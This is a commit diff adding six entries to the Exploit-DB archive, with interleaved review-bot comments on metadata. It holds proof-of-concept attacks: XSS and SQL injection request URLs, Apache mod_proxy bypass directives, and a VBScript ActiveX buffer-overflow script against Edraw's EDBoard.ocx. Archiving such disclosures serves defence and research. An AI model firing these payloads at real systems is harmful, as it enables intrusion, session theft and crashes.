DB: 2015-04-08

6 new exploits
Offensive Security 2015-04-08 08:36:35 +00:00
parent c7a0ac44ed
commit 9a45389171
8 changed files with 63 additions and 1 deletions


@ -33063,3 +33063,9 @@ id,file,description,date,author,platform,type,port
36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0
36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter Remote SQL Injection Vulnerability",2012-02-02,"Daniel Godoy",php,webapps,0
36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross Site Scripting Vulnerability",2012-02-02,"Red Security TEAM",php,webapps,0
36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting Vulnerability",2012-02-02,"BHG Security Center",php,webapps,0
36660,platforms/php/webapps/36660.txt,"project-open 3.4.x 'account-closed.tcl' Cross Site Scripting Vulnerability",2012-02-03,"Michail Poultsakis",php,webapps,0
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 'weblink_id' Parameter SQL Injection Vulnerability",2012-02-03,Am!r,php,webapps,0
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow Vulnerability",2012-02-06,"Senator of Pirates",windows,dos,0
36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2012-02-06,"Tomas Hoger",linux,remote,0
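Review bot: row 36660 is filed under platforms/php/webapps with platform php, but its own description names 'account-closed.tcl', so the php classification looks wrong for this entry. Please check the platform column and the directory for 36660 before merging, since the path and the platform field would have to change together.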


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/51869/info
Apache HTTP Server is prone to a security-bypass vulnerability.
Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications.
RewriteRule ^(.*) http://www.example.com$1
ProxyPassMatch ^(.*) http://www.example.com$1
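Review bot: the file lists the two directives without saying what makes them unsafe or which versions are affected; the CSV row for 36663 gives "<= 2.2.15" but that bound is missing here. In both `RewriteRule ^(.*) http://www.example.com$1` and `ProxyPassMatch ^(.*) http://www.example.com$1` the pattern does not require a leading `/` and `$1` is appended directly after the host name, which is the condition an administrator needs to look for in their own configuration. Suggest adding one sentence that says so, the affected version, and a note that a pattern anchored on the slash, such as `^/(.*)`, is the usual safe form, so the entry can be used to audit configs.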


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51803/info
iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search
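Review bot: no affected version appears anywhere for this entry, neither in this file nor in the CSV title for 36658, so a reader cannot tell which iknSupport releases to check or patch. Add a version or "tested on" line. The sample URL also contains raw double quotes and spaces; labelling it as a literal request line would keep it from being mangled by tools that parse the file.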


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51804/info
The Currency Converter component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51842/info
project-open is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/register/account-closed?message=[arbitrary-JavaScript]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/51865/info
PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/weblinks.php?weblink_id=[Sql]

platforms/windows/dos/36662.txt Executable file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/51866/info
Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.
Edraw Diagram Component 5 is vulnerable; other versions may also be affected.
Author : Senator of Pirates
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
--------------------------------------------------------------------------------------------------------
<object
classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid = "EDBoardLib.EDBoard"
argCount = 1
arg1=String(3092, "A")
target.LicenseName = arg1</script>
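Review bot: the header text claims arbitrary code execution, while the CSV row files 36662 as type dos and the script shown only assigns `String(3092, "A")` to `target.LicenseName`; the file should state what result was actually observed on the tested system (Windows XP SP3 EN) so the description and the classification agree. Separately, `targetFile`, `prototype`, `memberName`, `progid` and `argCount` are assigned but never used, and the `<script language='vbscript'>` tag opens on the same line as the first statement; dropping the unused assignments and putting the tags on their own lines would make the test case easier to read when writing a detection or verifying a fix.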


@ -4,7 +4,7 @@
#[+] Date: 27-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: https://www.internetdownloadmanager.com/
#[+] Vendor: http://www.internetdownloadmanager.com/
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Poc:http://i.imgur.com/7et4xSh.png
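Review bot: the two `#[+] Vendor:` lines differ only in scheme (https:// and http://), and the rendered hunk has lost its +/- markers, so the direction of the change is not visible here. If the new line is the http:// one, this downgrades the vendor link with no reason given in the commit message ("6 new exploits"); keep the https:// form or state why it changed. This edit to an existing file is also unrelated to the six additions and is not mentioned in the message.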